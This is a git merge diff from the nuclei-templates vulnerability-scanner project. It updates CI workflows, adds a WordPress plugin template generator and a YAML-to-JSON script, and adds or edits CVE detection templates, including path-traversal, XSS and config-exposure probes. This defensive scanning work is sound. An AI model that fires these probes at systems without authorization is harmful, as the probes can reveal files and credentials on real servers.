Merge branch 'main' of https://github.com/projectdiscovery/nuclei-templates into pr/6422
commit
b821ccbaf9
|
@ -0,0 +1,30 @@
|
|||
# Set to true to add reviewers to pull requests
|
||||
addReviewers: true
|
||||
|
||||
# Set to true to add assignees to pull requests
|
||||
addAssignees: true
|
||||
|
||||
# A list of reviewers to be added to pull requests (GitHub user name)
|
||||
reviewers:
|
||||
- ritikchaddha
|
||||
- DhiyaneshGeek
|
||||
- pussycat0x
|
||||
|
||||
# A number of reviewers added to the pull request
|
||||
# Set 0 to add all the reviewers (default: 0)
|
||||
numberOfReviewers: 1
|
||||
|
||||
# A list of assignees, overrides reviewers if set
|
||||
assignees:
|
||||
- DhiyaneshGeek
|
||||
- pussycat0x
|
||||
- ritikchaddha
|
||||
|
||||
# A number of assignees to add to the pull request
|
||||
# Set to 0 to add all of the assignees.
|
||||
# Uses numberOfReviewers if unset.
|
||||
numberOfAssignees: 1
|
||||
|
||||
# A list of keywords to be skipped the process that add reviewers if pull requests include it
|
||||
# skipKeywords:
|
||||
# - wip
|
|
@ -0,0 +1,10 @@
|
|||
beautifulsoup4==4.11.1
|
||||
bs4==0.0.1
|
||||
certifi==2022.9.24
|
||||
charset-normalizer==2.1.1
|
||||
idna==3.4
|
||||
Markdown==3.4.1
|
||||
requests==2.28.1
|
||||
soupsieve==2.3.2.post1
|
||||
termcolor==2.1.1
|
||||
urllib3==1.26.13
|
|
@ -0,0 +1,185 @@
|
|||
#!/usr/bin/env python3
|
||||
|
||||
'''
|
||||
This script reads the URL https://wordpress.org/plugins/browse/popular/ until page 10, extract each plugin name and namespace,
|
||||
then in http://plugins.svn.wordpress.org/ website, looks for the "Stable tag" inside the readme.txt and extract the last version
|
||||
number from trunk branch. Finally generates a template and a payload file with last version number to be used during scan that
|
||||
compares the detect version with the payload version.
|
||||
|
||||
The generated template also includes the tags top-100 and top-200 allowing filtering.
|
||||
|
||||
e.g.
|
||||
nuclei -t technologies/wordpress/plugins -tags top-100 -u https://www.example.com
|
||||
'''
|
||||
|
||||
__author__ = "ricardomaia"
|
||||
|
||||
from time import sleep
|
||||
from bs4 import BeautifulSoup
|
||||
import requests
|
||||
import re
|
||||
from markdown import markdown
|
||||
import os
|
||||
from termcolor import colored, cprint
|
||||
|
||||
# Regex to extract the name of th plugin from the URL
|
||||
regex = r"https://wordpress.org/plugins/(\w.+)/"
|
||||
|
||||
ranking = 1
|
||||
|
||||
# Top 200 Wordpress Plugins
|
||||
for page_number in range(1, 11):
|
||||
|
||||
html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}", headers={
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
|
||||
"Accept-Language": "en-US,en;q=0.9",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Connection": "keep-alive",
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"Cache-Control": "max-age=0",
|
||||
"Pragma": "no-cache",
|
||||
}).content
|
||||
|
||||
# Parse HTML
|
||||
soup = BeautifulSoup(html, 'html.parser')
|
||||
results = soup.find(id="main")
|
||||
articles = results.find_all("article", class_="plugin-card")
|
||||
|
||||
# Setting the top tag
|
||||
top_tag = "top-100,top-200" if page_number <= 5 else "top-200"
|
||||
|
||||
# Get each plugin in the page
|
||||
for article in articles:
|
||||
|
||||
full_title = article.find("h3", class_="entry-title").get_text()
|
||||
regex_remove_quotes = r"[\"`:]"
|
||||
subst_remove_quotes = "'"
|
||||
title = re.sub(regex_remove_quotes, subst_remove_quotes, full_title)
|
||||
|
||||
link = article.find("a").get("href")
|
||||
name = re.search(regex, link).group(1)
|
||||
|
||||
cprint(f"Title: {title}", "cyan")
|
||||
cprint(f"Link: {link}", "yellow")
|
||||
cprint(f"Name: {name} - Ranking: {ranking}", "green")
|
||||
print(f"Page Number: {page_number}")
|
||||
print(f"Top Tag: {top_tag}")
|
||||
print(f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt")
|
||||
ranking += 1
|
||||
|
||||
sleep(0.2)
|
||||
|
||||
# Get the readme.txt file from SVN
|
||||
readme = requests.get(
|
||||
url=f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt",
|
||||
headers={
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7,es;q=0.6",
|
||||
"Cache-Control": "no-cache",
|
||||
"Connection": "keep-alive",
|
||||
"Host": "plugins.svn.wordpress.org",
|
||||
"Pragma": "no-cache",
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"Referer": "http://plugins.svn.wordpress.org/{name}/trunk/"}).content
|
||||
|
||||
# Extract the plugin version
|
||||
try:
|
||||
version = re.search(r"(?i)Stable.tag:\s+([\w.]+)",
|
||||
readme.decode("utf-8")).group(1)
|
||||
except:
|
||||
version = "N/A"
|
||||
|
||||
# Extract the plugin description
|
||||
try:
|
||||
description_markdown = re.search(
|
||||
r"(?i)==.Description.==\W+\n?(.*)", readme.decode("utf-8")).group(1)
|
||||
html = markdown(description_markdown)
|
||||
full_description = BeautifulSoup(html, 'html.parser').get_text()
|
||||
regex_max_length = r"(\b.{80}\b)"
|
||||
subst_max_lenght = "\\g<1>\\n "
|
||||
description = re.sub(
|
||||
regex_max_length, subst_max_lenght, full_description, 0, re.MULTILINE)
|
||||
except:
|
||||
description = "N/A"
|
||||
|
||||
print(f"Version: {version}")
|
||||
print(f"Description: {description}")
|
||||
|
||||
# Write the plugin template to file
|
||||
template = f'''id: wordpress-{name}
|
||||
|
||||
info:
|
||||
name: {title} Detection
|
||||
author: ricardomaia
|
||||
severity: info
|
||||
reference:
|
||||
- https://wordpress.org/plugins/{name}/
|
||||
metadata:
|
||||
plugin_namespace: {name}
|
||||
wpscan: https://wpscan.com/plugin/{name}
|
||||
tags: tech,wordpress,wp-plugin,{top_tag}
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
- "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt"
|
||||
|
||||
payloads:
|
||||
last_version: helpers/wordpress/plugins/{name}.txt
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
internal: true
|
||||
name: internal_detected_version
|
||||
group: 1
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
name: detected_version
|
||||
group: 1
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
name: "outdated_version"
|
||||
dsl:
|
||||
- compare_versions(internal_detected_version, concat("< ", last_version))
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
'''
|
||||
|
||||
work_dir = os.getcwd()
|
||||
print(f"Current working directory: {work_dir}")
|
||||
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
|
||||
template_dir = f"{work_dir}/technologies/wordpress/plugins"
|
||||
|
||||
if not os.path.exists(helper_dir):
|
||||
os.makedirs(helper_dir)
|
||||
|
||||
if not os.path.exists(template_dir):
|
||||
os.makedirs(template_dir)
|
||||
|
||||
helper_path = f"helpers/wordpress/plugins/{name}.txt"
|
||||
version_file = open(helper_path, "w")
|
||||
version_file.write(version)
|
||||
version_file.close()
|
||||
|
||||
template_path = f"technologies/wordpress/plugins/{name}.yaml"
|
||||
template_file = open(template_path, "w") # Dev environment
|
||||
template_file.write(template)
|
||||
template_file.close()
|
||||
|
||||
print("--------------------------------------------")
|
||||
print("\n")
|
|
@ -0,0 +1,92 @@
|
|||
package main
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io/ioutil"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
|
||||
"gopkg.in/yaml.v3"
|
||||
)
|
||||
|
||||
type Classification struct {
|
||||
CVSSScore string `yaml:"cvss-score,omitempty"`
|
||||
}
|
||||
|
||||
type Info struct {
|
||||
Name string `yaml:"name"`
|
||||
Severity string `yaml:"severity"`
|
||||
Description string `yaml:"description"`
|
||||
Classification Classification `yaml:"classification,omitempty"`
|
||||
}
|
||||
|
||||
type Data struct {
|
||||
ID string `yaml:"id"`
|
||||
Info Info `yaml:"info"`
|
||||
FilePath string `json:"file_path"`
|
||||
}
|
||||
|
||||
func main() {
|
||||
if len(os.Args) != 3 {
|
||||
fmt.Println("Usage: go run main.go <directory> <output_file>")
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
directory := os.Args[1]
|
||||
outputFile := os.Args[2]
|
||||
|
||||
var data []Data
|
||||
|
||||
err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error {
|
||||
if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
|
||||
yamlFile, err := ioutil.ReadFile(path)
|
||||
if err != nil {
|
||||
fmt.Printf("Error reading YAML file %s: %v\n", path, err)
|
||||
return err
|
||||
}
|
||||
|
||||
var d Data
|
||||
err = yaml.Unmarshal(yamlFile, &d)
|
||||
if err != nil {
|
||||
fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err)
|
||||
return err
|
||||
}
|
||||
if d.Info.Classification.CVSSScore == "" {
|
||||
d.Info.Classification.CVSSScore = "N/A"
|
||||
}
|
||||
if d.Info.Classification == (Classification{}) {
|
||||
d.Info.Classification.CVSSScore = "N/A"
|
||||
}
|
||||
d.FilePath = path
|
||||
|
||||
data = append(data, d)
|
||||
}
|
||||
return nil
|
||||
})
|
||||
|
||||
if err != nil {
|
||||
fmt.Printf("Error reading directory: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
var jsonData []byte
|
||||
for _, d := range data {
|
||||
temp, err := json.Marshal(d)
|
||||
if err != nil {
|
||||
fmt.Printf("Error marshalling JSON: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
jsonData = append(jsonData, temp...)
|
||||
jsonData = append(jsonData, byte('\n'))
|
||||
}
|
||||
err = ioutil.WriteFile(outputFile, jsonData, 0644)
|
||||
if err != nil {
|
||||
fmt.Printf("Error writing JSON data to file: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
fmt.Println("JSON data written to", outputFile)
|
||||
}
|
||||
|
|
@ -3,28 +3,26 @@ name: ✍🏻 CVE Annotate
|
|||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
- main
|
||||
paths:
|
||||
- 'cves/**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
docs:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Setup CVE annotate
|
||||
if: steps.meta.outputs.TAG != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.TAG }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
|
||||
sudo unzip cve-annotate.zip -d /usr/local/bin
|
||||
working-directory: /tmp
|
||||
- name: cve-annotate install
|
||||
run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@latest
|
||||
|
||||
- name: Generate CVE Annotations
|
||||
id: cve-annotate
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
name: Generate JSON Metadata of CVE Templates
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.19
|
||||
check-latest: true
|
||||
|
||||
- name: run yaml2json.go to generate cves.json
|
||||
run: |
|
||||
go env -w GO111MODULE=off
|
||||
go get gopkg.in/yaml.v3
|
||||
go run .github/scripts/yaml2json.go /home/runner/work/nuclei-templates/nuclei-templates/cves/ cves.json
|
||||
|
||||
- name: Commit files
|
||||
run: |
|
||||
git pull
|
||||
git add cves.json
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated cves.json [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: master
|
|
@ -3,7 +3,9 @@ name: 🥳 New Template List
|
|||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
- main
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
|
|
|
@ -1,6 +1,10 @@
|
|||
name: ❄️ YAML Lint
|
||||
|
||||
on: [push, pull_request]
|
||||
on:
|
||||
pull_request:
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
name: 📝 Template Checksum
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.19
|
||||
check-latest: true
|
||||
cache: true
|
||||
|
||||
- name: install checksum generator
|
||||
run: |
|
||||
go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev
|
||||
|
||||
- name: generate checksum
|
||||
run: |
|
||||
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
|
||||
|
||||
- name: Commit files
|
||||
run: |
|
||||
git pull
|
||||
git add templates-checksum.txt
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated Templates Checksum [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: master
|
|
@ -3,18 +3,23 @@ name: 📑 Template-DB Indexer
|
|||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
- main
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
index:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/setup-go@v2
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
go-version: 1.19
|
||||
check-latest: true
|
||||
cache: true
|
||||
|
||||
- name: Intalling Indexer
|
||||
- name: Installing Indexer
|
||||
run: |
|
||||
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||
git clone https://github.com/projectdiscovery/nucleish-api.git
|
||||
|
|
|
@ -1,26 +1,26 @@
|
|||
name: 🛠 Template Validate
|
||||
|
||||
on: [ push, pull_request ]
|
||||
on:
|
||||
pull_request:
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Setup Nuclei
|
||||
if: steps.meta.outputs.TAG != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.TAG }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
|
||||
sudo unzip nuclei*.zip -d /usr/local/bin
|
||||
working-directory: /tmp
|
||||
- name: nuclei install
|
||||
run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
|
||||
|
||||
- name: Template Validation
|
||||
run: |
|
||||
|
|
|
@ -10,10 +10,14 @@ jobs:
|
|||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
go-version: 1.18
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Installing Template Stats
|
||||
run: |
|
||||
|
@ -52,4 +56,3 @@ jobs:
|
|||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: master
|
|
@ -0,0 +1,45 @@
|
|||
name: ✨ WordPress Plugins - Update
|
||||
|
||||
on:
|
||||
schedule:
|
||||
- cron: "0 4 * * *" # every day at 4am UTC
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
Update:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Check out repository code
|
||||
uses: actions/checkout@v3
|
||||
with:
|
||||
persist-credentials: false # otherwise, the token used is the GITHUB_TOKEN, instead of your personal token
|
||||
fetch-depth: 0 # otherwise, you will failed to push refs to dest repo
|
||||
|
||||
- name: Install Python3
|
||||
uses: actions/setup-python@v4
|
||||
with:
|
||||
python-version: "3.10"
|
||||
- run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip install -r .github/scripts/wordpress-plugins-update-requirements.txt
|
||||
|
||||
- name: Update Templates
|
||||
id: update-templates
|
||||
run: |
|
||||
python3 .github/scripts/wordpress-plugins-update.py
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.update-templates.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git add --all
|
||||
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:"
|
||||
|
||||
- name: Push changes
|
||||
if: steps.update-templates.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
|
|
@ -0,0 +1,11 @@
|
|||
cves/2022/CVE-2022-1168.yaml
|
||||
cves/2022/CVE-2022-39195.yaml
|
||||
exposed-panels/connect-box-login.yaml
|
||||
exposed-panels/esphome-panel.yaml
|
||||
exposed-panels/sqlbuddy-panel.yaml
|
||||
misconfiguration/esphome-dashboard.yaml
|
||||
vulnerabilities/other/academy-lms-xss.yaml
|
||||
vulnerabilities/other/slims-xss.yaml
|
||||
vulnerabilities/other/sound4-file-disclosure.yaml
|
||||
vulnerabilities/other/tikiwiki-xss.yaml
|
||||
"\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml"
|
24
README.md
24
README.md
|
@ -41,19 +41,19 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
## Nuclei Templates Top 10 statistics
|
||||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
|
||||
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
|
||||
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
|
||||
| tech | 357 | princechaddha | 153 | file | 78 | | | | |
|
||||
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 |
|
||||
| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 |
|
||||
| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 |
|
||||
| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 |
|
||||
| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | |
|
||||
| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | |
|
||||
| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | |
|
||||
| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | |
|
||||
| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | |
|
||||
| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | |
|
||||
|
||||
**321 directories, 4733 files**.
|
||||
**337 directories, 5307 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
4546
TEMPLATES-STATS.md
4546
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
22
TOP-10.md
22
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
|
||||
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
|
||||
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
|
||||
| tech | 357 | princechaddha | 153 | file | 78 | | | | |
|
||||
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 |
|
||||
| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 |
|
||||
| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 |
|
||||
| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 |
|
||||
| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | |
|
||||
| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | |
|
||||
| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | |
|
||||
| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | |
|
||||
| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | |
|
||||
| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | |
|
||||
|
|
|
@ -1,18 +1,21 @@
|
|||
id: CVE-2008-6465
|
||||
|
||||
info:
|
||||
name: Parallels H-Sphere - Cross Site Scripting
|
||||
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Multiple cross-site scripting (XSS) vulnerabilities in login.php in webshell4 in Parallels H-Sphere 3.0.0 P9 and 3.1 P1 allow remote attackers to inject arbitrary web script or HTML via the (1) err, (2) errorcode, and (3) login parameters.
|
||||
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
|
||||
reference:
|
||||
- http://www.xssing.com/index.php?x=3&y=65
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2008-6465
|
||||
cwe-id: CWE-80
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Parallels H-Sphere
|
||||
|
@ -40,3 +43,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2010-1429
|
||||
|
||||
info:
|
||||
name: JBossEAP - Sensitive Information Disclosure
|
||||
author: R12W4N
|
||||
severity: low
|
||||
description: |
|
||||
Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1429
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-3273
|
||||
- https://rhn.redhat.com/errata/RHSA-2010-0377.html
|
||||
- http://securitytracker.com/id?1023918
|
||||
classification:
|
||||
cve-id: CVE-2010-1429
|
||||
metadata:
|
||||
shodan-query: title:"JBoss"
|
||||
verified: "true"
|
||||
tags: cve,cve2010,jboss,eap,tomcat,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/status?full=true"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "JVM"
|
||||
- "memory"
|
||||
- "localhost/"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2016-6601
|
||||
|
||||
info:
|
||||
name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal
|
||||
name: ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
|
||||
description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.
|
||||
reference:
|
||||
- https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
|
||||
- https://www.exploit-db.com/exploits/40229/
|
||||
|
@ -30,3 +30,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2023/01/15
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2017-11165
|
||||
|
||||
info:
|
||||
name: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure
|
||||
author: theabhinavgaur
|
||||
severity: critical
|
||||
description: |
|
||||
dataTaker DT80 dEX 1.50.012 allows remote attackers to obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45094
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-11165
|
||||
- https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html
|
||||
- https://www.exploit-db.com/exploits/42313/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
